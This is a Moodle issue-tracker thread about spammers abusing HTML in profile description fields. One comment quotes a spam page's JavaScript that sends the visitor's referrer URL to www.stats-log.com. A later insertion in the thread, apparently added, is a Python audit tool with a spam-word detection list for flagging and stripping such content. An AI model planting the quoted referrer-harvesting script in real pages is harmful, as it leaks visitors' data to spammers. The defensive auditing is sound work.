Moodle

HTML code can be included in the description field of the profile, allowing links to other sites and providing extensive opportunities for abuse

Details

  • Type: Improvement
  • Status: Closed
  • Priority: Minor
  • Resolution: Duplicate
  • Affects Version/s: 1.5
  • Fix Version/s: None
  • Component/s: Other
  • Labels: None
  • Affected Branches: MOODLE_15_STABLE

Description

Spammers can enrol and use the description field in their profile to carry their ads, linking to other sites. There is at present nothing to prevent this from happening.

Activity

Mauno Korpelainen added a comment -

The latest versions of Moodle allow you to lock that field from Administration -> Users -> Authentication, or change the default authentication method. Is that version 1.5 correct?

Martin Dougiamas added a comment -

Have you also seen the forceloginforprofiles setting in the admin menu?

Mauno Korpelainen added a comment -

Would it be a bad idea to totally remove the description field from the user profile, or change it to a link to a field edited separately from the user profile? http://tracker.moodle.org/browse/MDL-7407 (captcha) might work to prevent "automatic mass registration", but it does not prevent possible abuse of the description field. During the last two weeks spammers have attacked about 1 million sites with link lists containing some Moodle site(s) and some user profile(s) filled with nasty (mostly illegal) material, and some of those links offer any type of worms, downloaders, backdoors, droppers or other types of trojans. Most of those attacked sites (found by searching "user/view.php" and some familiar spam words) don't even seem to know that they may have 100 illegal ads.

http://spamtrackers.eu/wiki/index.php?title=Main_Page gives more info about the tricks they have hidden behind links. Those spammers are not only sending mail - they are more likely searching for users who have not protected their home PCs or servers against viruses and executable programs, to be able to hijack usernames, passwords and finally servers for their needs...

Mauno Korpelainen added a comment - edited

On the other hand, the description field is very useful - but it could be uneditable by default, with a warning for admins about possible abuse of this field if the site is open to anybody (and advice to consider stricter site policies...)
Most of those new user profile pages with ads and links to "nasty sites" are created by bots or fake persons. It is safe to view those user profile pages on your Moodle site, but clicking any of the links advertising travel, cigarettes, watches, viagra... may cause trouble. Different links seem to have different tasks. For example, some links lead to a page that has a script like

<script>
  var r = document.referrer;  // URL of the page the visitor came from, e.g. your Moodle profile page
  document.write('<script src="http://www.stats-log.com/gb.php?id=g&r=' + escape(r) + '"><' + '/script>');
</script>

This tiny JavaScript takes your site address (document.referrer). It looks like a script that collects stats/logs, but it can be used to create a new spam server where part of the new server name comes from your site (the referrer page), or a new spam message containing your server. The server www.stats-log.com alone had over 5 million hits during the last 3 months, and there is an endless chain of similar servers (the expiration date for www.stats-log.com is 2008-01-12, but it definitely has many clones...). Most of the owners or contact persons found in whois info are unknown or fake.

We can't stop these guys (http://www.spamhaus.org/statistics/spammers.lasso) - they will continue searching for new weak points in Moodle too - but should something like http://spamlinks.net/prevent-users.htm be added to the documentation (security)?

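As an added example (not Moodle code, and not part of any comment above): a small Python audit of the kind a site admin could run over stored profile descriptions. It flags off-site links, any <script> element and spam words, and a second routine re-emits the description with <script> removed and rel="nofollow noreferrer" forced on every link, so a spam link earns no search ranking and a click does not hand the profile URL to the target through document.referrer. The spam-word list, the host name example-moodle.test and the two sample descriptions are constructed for the example.

```python
"""Audit and harden HTML stored in a user profile "description" field.

Added example, not Moodle code. It assumes the description is stored as an
HTML fragment (as the report says) and uses a constructed spam-word list and
constructed sample descriptions; the host name example-moodle.test is made up.
"""
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

SPAM_WORDS = ("viagra", "cigarettes", "watches", "casino")  # constructed list


def _host(url):
    try:
        return (urlsplit(url).hostname or "").lower()
    except ValueError:
        return ""


class _Collector(HTMLParser):
    """Gather link targets, script sources and visible text from a fragment."""

    def __init__(self):
        super().__init__()
        self.hrefs, self.script_srcs, self.text = [], [], []
        self.scripts = 0
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self.hrefs.append(a["href"])
        elif tag == "script":
            self.scripts += 1
            self._in_script = True
            if a.get("src"):
                self.script_srcs.append(a["src"])

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if not self._in_script:
            self.text.append(data)


def audit_description(fragment, site_host):
    """Flag off-site links, any <script>, and spam words in one description."""
    c = _Collector()
    c.feed(fragment)
    c.close()
    offsite = [u for u in c.hrefs + c.script_srcs
               if _host(u) and _host(u) != site_host.lower()]
    haystack = (" ".join(c.text) + " " + " ".join(offsite)).lower()
    words = [w for w in SPAM_WORDS if re.search(r"\b%s\b" % w, haystack)]
    return {"offsite_links": offsite, "scripts": c.scripts, "spam_words": words,
            "suspicious": bool(offsite or c.scripts or words)}


class _Hardener(HTMLParser):
    """Re-emit a fragment with <script> dropped and every <a> forced to
    rel="nofollow noreferrer": the link earns no search ranking and a click
    no longer passes the profile URL to the target via document.referrer."""

    def __init__(self):
        super().__init__()
        self.out, self._skip = [], 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._skip += 1
        elif not self._skip:
            if tag == "a":
                attrs = [kv for kv in attrs if kv[0] != "rel"] + [("rel", "nofollow noreferrer")]
            rendered = "".join(' %s="%s"' % (k, html.escape(v or "", quote=True)) for k, v in attrs)
            self.out.append("<%s%s>" % (tag, rendered))

    def handle_endtag(self, tag):
        if tag == "script":
            self._skip = max(0, self._skip - 1)
        elif not self._skip:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self._skip:
            self.out.append(html.escape(data, quote=False))


def harden_description(fragment):
    h = _Hardener()
    h.feed(fragment)
    h.close()
    return "".join(h.out)


# Constructed sample descriptions (not real profiles).
SAMPLES = {
    "honest": '<p>I teach maths. See <a href="https://example-moodle.test/course/view.php?id=3">my course</a>.</p>',
    "spam": '<p>Cheap watches and viagra: <a href="http://shop.example.net/w">buy</a></p>'
            '<script src="http://www.stats-log.com/gb.php?id=g"></script>',
}

if __name__ == "__main__":
    for name, frag in SAMPLES.items():
        print(name, audit_description(frag, "example-moodle.test"))
        print("   hardened:", harden_description(frag))
```

Run against a real site, the audit would be fed the description column of the user table and the site's own host name; anything it marks suspicious is a profile to review rather than a verdict, since an honest user may legitimately link off-site. The hardener is a rendering-time measure and does not replace locking the field or requiring login to view profiles.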
Helen Foster added a comment -

Not quite a duplicate, but very similar to MDL-17107.

Helen Foster added a comment -

Colin, thanks for your report, and Mauno, thanks for your comments.

Closing as duplicate. Please watch / vote for / comment on the more recent issue - MDL-17107.

